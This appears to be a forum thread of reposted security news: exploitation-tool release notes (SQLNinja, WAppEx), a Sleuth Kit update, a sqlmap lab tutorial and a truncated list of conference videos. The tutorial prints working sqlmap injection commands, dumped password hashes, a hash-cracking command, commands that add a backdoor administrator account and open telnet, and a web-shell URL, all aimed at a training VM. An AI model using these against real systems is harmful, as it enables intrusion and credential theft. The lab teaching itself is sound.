[h=1]SQLNinja 0.2.999-alpha1[/h]by Mayuresh on February 6, 2013 We finally have a SQLNinja update! We first covered the awesome tool here! We now have SQLNinja version 0.2.999-alpha1! This is the first alpha of the new release, with all the newest cool stuff like data extraction via WAITFOR and DNS tunnel, plus vbscript-based upload! Sqlninja is an exploitation tool to be used against web apps based on MS SQL Server that are vulnerable to SQL Injection attacks, in order to get a shell also in very hostile conditions. Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.” [h=2]Change log for SQLNinja 0.2.999-alpha1:[/h] Added data extraction module Added vbscript-based upload Split big ugly script into modules Lots of refactoring [h=3]Download SQLNinja 0.2.999-alpha1:[/h] SQLNinja 0.2.999-alpha1 – sqlninja-0.2.999-alpha1.tgz 0.2.999-alpha1 Sursa: SQLNinja version 0.2.999-alpha1! — PenTestIT

[h=1]WAppEx 2.0![/h]by Mayuresh on February 6, 2013 Our first post about WAppEx can be found here. Recently, an update – WAppEx 2.0 was made available! This release is a huge leap from the previous one (version 1.0) and as such has been given a major version increment. It is nothing short of a total remake of the whole software! In favour of greater extensibility and flexibility WAppEx 2.0 has all the exploitation logic moved to a core exploit database. The full-fledged exploit database not only provides the good old exploits with a lot of new features, but also stands for sharing, updating, extending and more. The database is rich with new payloads, and major improvements have been made to the existing payloads and exploits. Now you can unleash massive security tests by executing a batch test of multiple exploits against multiple targets; all in one single action. The Test-on-Targets feature automates much of the tasks you would have to do manually in the previous version. Still in addition to all this, a shining toolbox of new tools has been added to the suite. Some of the new tools added are Manual Request, Dork Finder, Exploit Editor, Hidden File Checker, and Neighbor Site Finder! “WAppEx is an integrated Web Application security assessment and exploitation platform designed with the whole spectrum of security professionals to web application hobbyists in mind. It suggests a security assessment model which revolves around an extensible exploit database. Further, it complements the power with various tools required to perform all stages of a web application attack.” [h=2]Changes made to WAppEx 2.0:[/h] Auto-detect feature deleted from exploits Browser tool deleted Exploits and payloads view changed Exploit Database with the following features added: New script syntax and structure Searching, selecting, and executing of exploits. Add/remove database entries (exploits or payloads) Add exploits or payloads to the database using either the Exploit Wizard or the script file Batch testing of multiple targets against multiple exploits Execute multiple instances of one or more payloads (for every running exploit) simultaneously. Following tools added: Manual Request Dork Finder Exploit Editor Hidden File Checker Neighbor Site Finder [*]Local File Inclusion analyzer script updated [*]24 new payloads for LFI, RFI, and PHP Code Execution vulnerabilities added: Directory Explorer CodeExec Bind 3 connect-back shells Code Execution MySQL Dump ServerInfo 4 command execution payloads [*]Bug-fixes: Find Login Page crashed on start Problem with software registration Stop button did not work when retrieving data from SQL server Problem with saving SQL results Crashed when closing Find Login Page Status icons were not displayed properly in exploit tabs [h=3]Download WAppEx:[/h] WAppEX 2.0 – WAppEx2.0.exe Sursa: WAppEx version 2.0! — PenTestIT

[h=1]Sleuth Kit 4.0.2![/h]by Mayuresh on February 6, 2013 Two days ago, The Sleuth Kit was updated! We now have The Sleuth Kit version 4.0.2. Our first post about The Sleuth Kit or TSK can be found here. This release has bug fixes and some new minor features. “The Sleuth Kit (TSK) is a library and collection of command line tools that allow you to investigate volume and file system data. It is a collection of open source file system forensics tools that allow one to view allocated and deleted data from NTFS, FAT, FFS, and EXT2FS images. The Autopsy Forensic Browser provides a graphical interface to The Sleuth Kit. The Sleuth Kit is an open source forensic toolkit for analyzing Microsoft and UNIX file systems and disks. The Sleuth Kit enables investigators to identify and recover evidence from images acquired during incident response or from live systems. The Sleuth Kit is open source, which allows investigators to verify the actions of the tool or customize it to specific needs.“ [h=2]Official change log for The Sleuth Kit:[/h] New Features in Core: fiwalk is now included. Bug Fixes in Core: Fixed fcat to work on NTFS files (still doesn’t support ADS though). Fixed HFS+ support in tsk_loaddb / SQLite — root directory was not added. NTFS code now looks at all MFT entries when listing directory contents. It used to only look at unallocated entries for orphan files. This fixes an image that had allocated files missing from the directory b-tree. NTFS code uses sequence number when searching MFT entries for all files. Libewf detection code change to support v2 API more reliably (ID: 3596212). NTFS $SII code could crash in rare cases if $SDS was multiple of block size. Framework: Added new API to TskImgDB that returns the base name of an image. Numerous performance improvements to framework. Removed requirement in framework to specify module extension in pipeline configuration file. Added blackboard artifacts to represent both operating system and network service user accounts. Java Bindings: More methods to query files Methods to get current directory when being added to DB. Modified class structure a bit More lazy loading for children / parents. Better exception throwing from C++ [h=3]Download The Sleuth Kit:[/h] The Sleuth Kit 4.0.2 – sleuthkit-win32-4.0.2.zip/sleuthkit-framework-win32-4.0.2.zip/sleuthkit-4.0.2.tar.gz Sursa: The Sleuth Kit 4.0.2! — PenTestIT

+ Java SE Proof Of Concept Code ? Packet Storm

[h=1]Video Tutorial: Basics of using sqlmap automated sql injection audit tool[/h]Posted by webpwnized in Information Security on Feb 6, 2013 6:01:03 AM Author: Jeremy Druin Twitter: @webpwnized YouTube Channel: webpwnized's channel - YouTube Software required: Backtrack 5 R3 with sqlmap, Mutillidae Web Pen Test Training Environment (hxxp://sourceforge.net/projects/mutillidae/files/mutillidae-project/) ecorded at the ISSA Kentuckiana February 2013 Workshop, this video review the use of sqlmap; an automated sql injection audit tool. The video walks through using sqlmap to locate an sql injection, determine the backend database type, enumerate the database account, databases, schema, tables, columns and password hashes, then use the database to compromise the windows host. Dumping data, arguably the primary use of sqlmap, is covered only briefly since there is large amounts of documentation on this feature already. Environment The environment is a Backtrack 5 R3 "attacker" at IP 192.168.56.101 and a Windows XP "victim" at 192.168.56.102 running as virtual machines on Oracle VirtualBox. The Windows XP host is running XAMPP on which Mutillidae is installed. Mutillidae may also be installed on WAMPP or LAMP stacks including being able to be installed on Linux. Using two hosts is not neccesary to recreate the lab exercise. All of the items can be reproduced on "localhost". The database was created by installing XAMPP, unzipping the Mutillidae files into the C:\xampp\htdocs\ directory, then clicking the "Set up database" button in Mutillidae. Mutillidae has a deliberately vulnerable login page against which the sql injection was carried out. Notes from Presentation Please find notes from the talk below which can be used to follow along with the video. -------------------------------------------------- Running SQLMAP Help -------------------------------------------------- --help Help -hh Double the help -------------------------------------------------- Running SQLMAP "Manually" -------------------------------------------------- ./sqlmap.py --url="http://192.168.56.102/mutillidae/index.php?page=login.php" --data="username=asdf&password=asdf&login-php-submit-button=Login" --banner -------------------------------------------------- Capturing Request To Pass To SQLMAP -------------------------------------------------- URL: http://192.168.56.102/mutillidae/index.php?page=login.php Request: POST /mutillidae/index.php?page=login.php HTTP/1.1 Host: 192.168.56.102 User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.56.102/mutillidae/index.php?page=login.php Cookie: showhints=0; PHPSESSID=fik978dbhcujcgdjfc2lg249r4 Content-Type: application/x-www-form-urlencoded Content-Length: 57 username=asdf&password=asdf&login-php-submit-button=Login -------------------------------------------------- Running SQLMAP with "auto-parse" -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options> -------------------------------------------------- Running SQLMAP with various features -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request <options> --banner web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: MySQL 5.0 banner: '5.5.25a' --fingerprint web server operating system: Windows web application technology: PHP 5.4.4, Apache 2.4.2 back-end DBMS: active fingerprint: MySQL >= 5.5.0 --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA current user: 'root@localhost' current database: 'nowasp' current user is DBA: True hostname: 'mutillid-7se1xr' --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes database management system users [*] ''@'localhost' [*] 'pma'@'localhost' [*] 'root'@'linux' [*] 'root'@'localhost' --dbs Enumerate DBMS databases available databases[10]: [*] cdcol [*] information_schema [*] mysql [*] nowasp [*] owasp10 [*] owasp13 [*] performance_schema [*] phpmyadmin [*] test [*] webauth -------------------------------------------------------------------------------- -------------------- Enumerate DBMS database tables, columns, structure (schema) -------------------------------------------------------------------------------- -------------------- --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --exclude-sysdbs Exclude DBMS system databases when enumerating tables -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate -------------------------------------------------- Extracting data -------------------------------------------------- --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell -------------------------------------------------- Listing columns from tables -------------------------------------------------- ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --columns ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql -T user --common-columns ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select column_name from information_schema.columns where table_name = 'user'" select column_name from information_schema.columns where table_name = 'user' [42]: [*] Alter_priv [*] Alter_routine_priv [*] authentication_string [*] Create_priv [*] Create_routine_priv [*] Create_tablespace_priv [*] Create_tmp_table_priv [*] Create_user_priv [*] Create_view_priv [*] Delete_priv [*] Drop_priv [*] Event_priv [*] Execute_priv [*] File_priv [*] Grant_priv [*] Host [*] Index_priv [*] Insert_priv [*] Lock_tables_priv [*] max_connections [*] max_questions [*] max_updates [*] max_user_connections [*] Password [*] plugin [*] Process_priv [*] References_priv [*] Reload_priv [*] Repl_client_priv [*] Repl_slave_priv [*] Select_priv [*] Show_db_priv [*] Show_view_priv [*] Shutdown_priv [*] ssl_cipher [*] ssl_type [*] Super_priv [*] Trigger_priv [*] Update_priv [*] User [*] x509_issuer [*] x509_subject -------------------------------------------------- Advanced: Modifying injections -------------------------------------------------- SELECT * FROM accounts WHERE username='' AND password=''' ./sqlmap.py -r ~/engagements/sqlmap/login.php.request --prefix="SELECT * FROM accounts WHERE username='" --suffix="'-- " --banner --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string -------------------------------------------------- Advanced: Dealing with inconsistent results -------------------------------------------------- select User, Password from mysql.user versus ./sqlmap.py -r ~/engagements/sqlmap/login.php.request -D mysql --sql-query="select User, Password from mysql.user order by User desc" select User, Password from mysql.user order by User desc select User, Password, Host, authentication_string from mysql.user order by User desc [9]: [*] root, , localhost, [*] root, , linux, [*] pma, , localhost, [*] Simba, *F43B942A34347297C3B0455DAB190AFB9BBF13B5, localhost, [*] Rocky, *2BA8DF85753BE61F6C72A8784B11E68A41878032, localhost, [*] Patches, *2027D9391E714343187E07ACB41AE8925F30737E, localhost, [*] Happy, *160E7D8EE3A97BED0F0AD1563BFB619178D15D7B, localhost, [*] , , localhost, [*] , , linux, -------------------------------------------------- Cracking MySQL Password Hashes -------------------------------------------------- John the Ripper Command Line /pentest/passwords/john/john --format=mysql-sha1 /tmp/mysql.hashes Password Hashes in MySQL Format Simba:*F43B942A34347297C3B0455DAB190AFB9BBF13B5 Rocky:*2BA8DF85753BE61F6C72A8784B11E68A41878032 Patches:*2027D9391E714343187E07ACB41AE8925F30737E Happy:*160E7D8EE3A97BED0F0AD1563BFB619178D15D7B -------------------------------------------------- Understanding sqlmap O/S Shell -------------------------------------------------- View transaction: tcpdump -i eth1 -vvv -X 1st Stage Uploader 2nd Stage Command Shell Page sc query state= all sc query tlntsvr sc config tlntsvr start= demand sc start tlntsvr net user root toor /add net localgroup TelnetClients /add net localgroup Administrators root /add net localgroup TelnetClients root /add netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom addresses=192.168.56.101 -------------------------------------------------- Interacting Directly with sqlmap O/S Shell Backdoor -------------------------------------------------- http://192.168.56.102/<temp file name>?cmd=ping%20192.168.56.101 -------------------------------------------------- Direct connection to the database -------------------------------------------------- Installing Py-MySQL Dependency git clone https://github.com/petehunt/PyMySQL/ cd PyMySQL python setup.py install cd .. rm -rf PyMySQL ./sqlmap.py -d mysql://root:""@192.168.56.102:5123/OWASP10 Sursa: https://community.rapid7.com/community/infosec/blog/2013/02/06/video-tutorial-basics-of-using-sqlmap-automated-sql-injection-audit-tool

Linux.conf.au 2013 Videos We've released these videos as quickly as possible so that people can enjoy the many great talks at LCA this year, and so we can get our rendering gear out of the venue. We know some of these may have problems, but most of them are working and tested. Please let us know if there's anything that is mistitled, short or otherwise incorrect and we'll deal with it as soon as possible. Helpful debugging information: if the closing screen (the balloons over old Parliament House) doesn't show at the end of the talk, then the file was partly rendered but the render machine probably locked up. If the closing screen shows but the talk was incomplete, then some parts of the talk may be missing, or we might simply have mistakenly unselected one of the raw video files. The former case is easily recoverable; the latter may be impossible to fix without a time machine but may also be recoverable. Let us know either way Things we can't fix: Sir Tim Berners-Lee's keynote on Friday and DSD and Open Source on Wednesday. We don't have permission to record the video for those talks. Sorry, if you weren't there, you've missed it Videos we know have problems: Bdale Garbee's Keynote on Monday - missing. Unfortunately our video capture system failed on us and we captured this on four DV tapes. I've got the 32GB of video of this on a hard disk, and I've cut together a full video in PiTiVi but it seems to refuse to render it. I will be trying Cinelerra to see if that works, or if restarting my PiTiVi project from scratch fixes it. This is a long job and will have to wait for the moment - Paul, 5/2/13. Miniconf videos. These were captured and are on file but the schedule in the video processing system is out of date. I'm going to try importing the latest schedule and seeing if that fixes it without also breaking every other talk. If not, I'll recreate the schedule by hand - Paul, 5/2/13. Ain't No Party Like A Unix Party - mislabeled talk (thanks Tim Suess). Daniel Black notes that this might be mislabeled as 'Touch And Go - Modern User Interfaces Using Open Source. This is probably a schedule mismatch and hopefully an easy fix - Paul, 5/2/13. Why Kernel space sucks - audio drops at end (thanks Neil Brown). This is probably unrecoverable but I'll review it - Paul, 5/2/13. Bufferbloat from a Plumber's point of viewi (mp4) - only the end of the talk (thanks Dave Taht and Andrew McDonnell). This may be a missing or incorrectly skipped DV file - will review - Paul, 5/2/13. The future of nonvolatile memory (ogv) - truncated (thanks Neil Brown). Probably one of the render nodes locked up during rendering - will re-render - Paul, 5/2/13. High Speed Data Acquisition - missing (thanks Andrew McDonnell). I know we have this talk, I'm just not sure why it hasn't been rendered - will fix - Paul, 5/2/13. Copyright's Dark Clouds - Optus v NRL (ogv), Free and Open Source Software and Activism (ogv), Openstack on Openstack - a single management API for all your servers (ogv and mp4), and Using open source in over 1100 schools in New Zealand (ogv) - all truncated (thanks Ambrose Andrews, Robert Collins and Daniel Bryant). These are definitely rendering errors and we'll rebuild them - Paul, 5/2/13. The IPocalypse 20 months later (mp4) and RealTime Response on Multicore Systems - It is bigger than I thought (mp4) - both shorter than expected (thanks Ashley Hull). Probably render node failure, will reprocess - Paul, 5/2/13. Linux Gaming At Last - Tuning Open Source Graphics Drivers for Valve Software (ogv) - seems to skip at about 0:12:39 and resolve the problem soon after (thanks Phil Ingram). This may have been a rendering issue, will reprocess to try and fix it - Paul, 6/2/13. Thanks to everyone who's reported problems - it's not a perfect system, but check back here after Wednesday 6th February for updates. The overall response to getting the videos up quickly rather than perfectly has been very positive - thanks for your support! Paul Wayper, AV Wrangler [TABLE] [TR] [TD][/TD] [TD]Parent Directory[/TD] [TD] [/TD] [TD=align: right] - [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]3D_Printing_with_Repsnapper.mp4[/TD] [TD=align: right]02-Feb-2013 18:00 [/TD] [TD=align: right] 88M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]15MW_and_3600_penguins_in_a_room_Supercomputing_at_ANU.mp4[/TD] [TD=align: right]03-Feb-2013 17:42 [/TD] [TD=align: right] 91M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]A_New_Linux_Platform_Hardware_and_Software.mp4[/TD] [TD=align: right]03-Feb-2013 16:55 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]After_Arduino.mp4[/TD] [TD=align: right]04-Feb-2013 10:13 [/TD] [TD=align: right] 66M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]An_Introduction_to_Linux_IPC_Facilities.mp4[/TD] [TD=align: right]03-Feb-2013 12:21 [/TD] [TD=align: right]260M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]ArduSat_Open_Source_in_orbit.mp4[/TD] [TD=align: right]02-Feb-2013 19:21 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Beyond_Alt_Text_What_Every_Project_Should_Know_About_Accessibility.mp4[/TD] [TD=align: right]04-Feb-2013 09:45 [/TD] [TD=align: right] 58M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Big_and_Little_Endian_inside_out.mp4[/TD] [TD=align: right]04-Feb-2013 10:25 [/TD] [TD=align: right]112M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Bufferbloat_from_a_Plumbers_point_of_view.mp4[/TD] [TD=align: right]02-Feb-2013 17:46 [/TD] [TD=align: right]7.6M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Building_Persona_federated_and_privacysensitive_identity_for_the_Web.mp4[/TD] [TD=align: right]03-Feb-2013 17:41 [/TD] [TD=align: right] 23M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Building_a_free_software_telemetry_radio_system.mp4[/TD] [TD=align: right]02-Feb-2013 21:05 [/TD] [TD=align: right] 63M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ceph_Managing_A_Distributed_Storage_System_At_Scale.mp4[/TD] [TD=align: right]03-Feb-2013 17:42 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ceph_object_storage_block_storage_file_system_replication_massive_scalability_and_then_some.mp4[/TD] [TD=align: right]03-Feb-2013 16:18 [/TD] [TD=align: right]155M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Checkpoint_and_Restore_are_we_there_yet.mp4[/TD] [TD=align: right]02-Feb-2013 18:51 [/TD] [TD=align: right] 48M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Code_up_your_own_video_conference_in_HTML5.mp4[/TD] [TD=align: right]02-Feb-2013 19:08 [/TD] [TD=align: right] 66M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Concurrent_Programming_with_the_Disruptor.mp4[/TD] [TD=align: right]02-Feb-2013 20:05 [/TD] [TD=align: right] 54M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Conference_Closing.mp4[/TD] [TD=align: right]03-Feb-2013 17:35 [/TD] [TD=align: right]210M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Conference_Closing_Lightning_Talks.mp4[/TD] [TD=align: right]03-Feb-2013 17:20 [/TD] [TD=align: right]124M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Copyrights_Dark_Clouds_Optus_v_NRL.mp4[/TD] [TD=align: right]02-Feb-2013 19:11 [/TD] [TD=align: right]3.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Designing_a_Verifiable_and_Accessible_Electronic_Voting_System.mp4[/TD] [TD=align: right]02-Feb-2013 20:07 [/TD] [TD=align: right]2.5M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Droids_that_talk_Pairing_Codec2_and_Android.mp4[/TD] [TD=align: right]04-Feb-2013 13:20 [/TD] [TD=align: right] 31M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Free_and_open_source_software_and_activism.mp4[/TD] [TD=align: right]04-Feb-2013 13:10 [/TD] [TD=align: right]167K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Future_directions_for_the_X_Window_System.mp4[/TD] [TD=align: right]04-Feb-2013 09:45 [/TD] [TD=align: right] 87M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Geeks_rule_over_kings_the_Distributed_Democracy.mp4[/TD] [TD=align: right]02-Feb-2013 19:20 [/TD] [TD=align: right]3.0M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Getting_older_Tips_tricks_for_designing_inclusive_open_source_user_interfaces.mp4[/TD] [TD=align: right]02-Feb-2013 18:48 [/TD] [TD=align: right] 31M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Git_For_Ages_4_And_Up.mp4[/TD] [TD=align: right]02-Feb-2013 22:52 [/TD] [TD=align: right]342M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Git_not_just_for_source_code_anymore.mp4[/TD] [TD=align: right]02-Feb-2013 20:29 [/TD] [TD=align: right] 74M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Graphics_from_Gamepads_Guitars_and_Gadgets_Galore.mp4[/TD] [TD=align: right]03-Feb-2013 18:12 [/TD] [TD=align: right] 83M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]HEADER.html[/TD] [TD=align: right]06-Feb-2013 11:05 [/TD] [TD=align: right]4.4K[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Heat_Orchestrating_multiple_cloud_applications_on_OpenStack_using_templates.mp4[/TD] [TD=align: right]03-Feb-2013 16:38 [/TD] [TD=align: right] 87M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_Mozilla_draws_the_line_between_configuration_and_data_while_using_configuration_management_tools.mp4[/TD] [TD=align: right]04-Feb-2013 09:27 [/TD] [TD=align: right] 69M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_Fix_a_Font.mp4[/TD] [TD=align: right]03-Feb-2013 00:15 [/TD] [TD=align: right] 77M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_make_almost_anything_go_faster.mp4[/TD] [TD=align: right]03-Feb-2013 00:02 [/TD] [TD=align: right] 51M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]How_to_use_Puppet_like_an_Adult.mp4[/TD] [TD=align: right]03-Feb-2013 11:56 [/TD] [TD=align: right] 85M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Keynote_Andrew_Bunnie_Huang.mp4[/TD] [TD=align: right]03-Feb-2013 01:37 [/TD] [TD=align: right] 77M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Keynote_Radia_Perlman.mp4[/TD] [TD=align: right]03-Feb-2013 11:33 [/TD] [TD=align: right]117M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]LTTng_20_Advanced_Linux_tracing_for_everyone.mp4[/TD] [TD=align: right]04-Feb-2013 12:19 [/TD] [TD=align: right] 86M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Lighting_up_OpenCV_with_Ne10_and_NEON.mp4[/TD] [TD=align: right]04-Feb-2013 09:34 [/TD] [TD=align: right] 56M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Linux_Gaming_at_Last_Tuning_Open_Source_Graphics_Drivers_for_Valve_Software.mp4[/TD] [TD=align: right]02-Feb-2013 20:19 [/TD] [TD=align: right] 35M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Main_conference_opening.mp4[/TD] [TD=align: right]02-Feb-2013 17:57 [/TD] [TD=align: right] 84M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Make_your_software_understand_your_nonUS_accent.mp4[/TD] [TD=align: right]02-Feb-2013 19:08 [/TD] [TD=align: right] 58M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_Mobile_Communications_Secure.mp4[/TD] [TD=align: right]04-Feb-2013 11:05 [/TD] [TD=align: right]116M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_RCU_Respect_Your_Devices_Battery_Lifetime.mp4[/TD] [TD=align: right]02-Feb-2013 19:34 [/TD] [TD=align: right] 71M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Making_UEFI_Secure_boot_work_for_you.mp4[/TD] [TD=align: right]02-Feb-2013 21:02 [/TD] [TD=align: right] 79M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Maximum_Clojure_Performance.mp4[/TD] [TD=align: right]02-Feb-2013 21:04 [/TD] [TD=align: right] 71M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Measuring_and_Improving_OpenGL_Performance.mp4[/TD] [TD=align: right]02-Feb-2013 22:03 [/TD] [TD=align: right] 59M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]MySQL_in_the_cloud_as_a_service.mp4[/TD] [TD=align: right]03-Feb-2013 17:17 [/TD] [TD=align: right]166M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]NetFPGA_USB_2_interface.mp4[/TD] [TD=align: right]02-Feb-2013 22:40 [/TD] [TD=align: right]148M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]NovaProva_or_How_I_Did_Six_Impossible_Things_Before_LCA.mp4[/TD] [TD=align: right]03-Feb-2013 16:41 [/TD] [TD=align: right] 97M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]OWASP_Developer_Guide_2013_what_it_means_for_open_source_projects.mp4[/TD] [TD=align: right]04-Feb-2013 12:24 [/TD] [TD=align: right] 81M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]OpenStack_Zuul.mp4[/TD] [TD=align: right]04-Feb-2013 09:53 [/TD] [TD=align: right] 78M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_Digital_Radio.mp4[/TD] [TD=align: right]03-Feb-2013 00:06 [/TD] [TD=align: right] 79M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_Firmware.mp4[/TD] [TD=align: right]04-Feb-2013 13:05 [/TD] [TD=align: right] 47M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Open_Source_and_Open_Data_for_Humanitarian_Response_with_OpenStreetMap.mp4[/TD] [TD=align: right]03-Feb-2013 00:03 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Openstack_on_Openstack_a_single_management_API_for_all_your_servers.mp4[/TD] [TD=align: right]04-Feb-2013 09:17 [/TD] [TD=align: right]1.4M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Playing_with_OpenStack_Swift.mp4[/TD] [TD=align: right]03-Feb-2013 11:57 [/TD] [TD=align: right] 95M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ponies_and_Rainbows_Clutter_20_and_GTK_40.mp4[/TD] [TD=align: right]03-Feb-2013 17:44 [/TD] [TD=align: right]106M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]PostgreSQL_92_Full_Throttle_Database.mp4[/TD] [TD=align: right]03-Feb-2013 16:09 [/TD] [TD=align: right] 96M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Pre_dinner_thingy_robert_llewellyn_and_simon_hackett.mp4[/TD] [TD=align: right]03-Feb-2013 16:42 [/TD] [TD=align: right] 93M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Quantitative_community_management.mp4[/TD] [TD=align: right]03-Feb-2013 16:07 [/TD] [TD=align: right] 99M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Quiltwork_patch_deployment_in_nz_and_au.mp4[/TD] [TD=align: right]02-Feb-2013 23:11 [/TD] [TD=align: right] 72M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RAID_is_more_than_parity_and_mirrors.mp4[/TD] [TD=align: right]04-Feb-2013 10:04 [/TD] [TD=align: right]122M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]REPENT_FOR_THE_END_OF_THE_UNIX_EPOCH_IS_NIGH.mp4[/TD] [TD=align: right]02-Feb-2013 20:19 [/TD] [TD=align: right] 74M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]RealTime_Response_on_Multicore_Systems_It_Is_Bigger_Than_I_Thought.mp4[/TD] [TD=align: right]02-Feb-2013 19:12 [/TD] [TD=align: right] 23M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Rethinking_CPU_hotplug_for_elegance_and_efficiency.mp4[/TD] [TD=align: right]02-Feb-2013 20:04 [/TD] [TD=align: right] 90M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ript_a_terse_but_expressive_DSL_for_iptables.mp4[/TD] [TD=align: right]02-Feb-2013 21:40 [/TD] [TD=align: right] 68M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Ristretto_runtime_types_for_JavaScript.mp4[/TD] [TD=align: right]03-Feb-2013 17:00 [/TD] [TD=align: right] 83M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Scratching_your_own_itch_subsurface_diving_log.mp4[/TD] [TD=align: right]03-Feb-2013 15:24 [/TD] [TD=align: right]118M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Shell_for_Starters.mp4[/TD] [TD=align: right]04-Feb-2013 12:09 [/TD] [TD=align: right]135M[/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD]Software_Transactional_Memory_in_GCC_47.mp4[/TD] [TD=align: 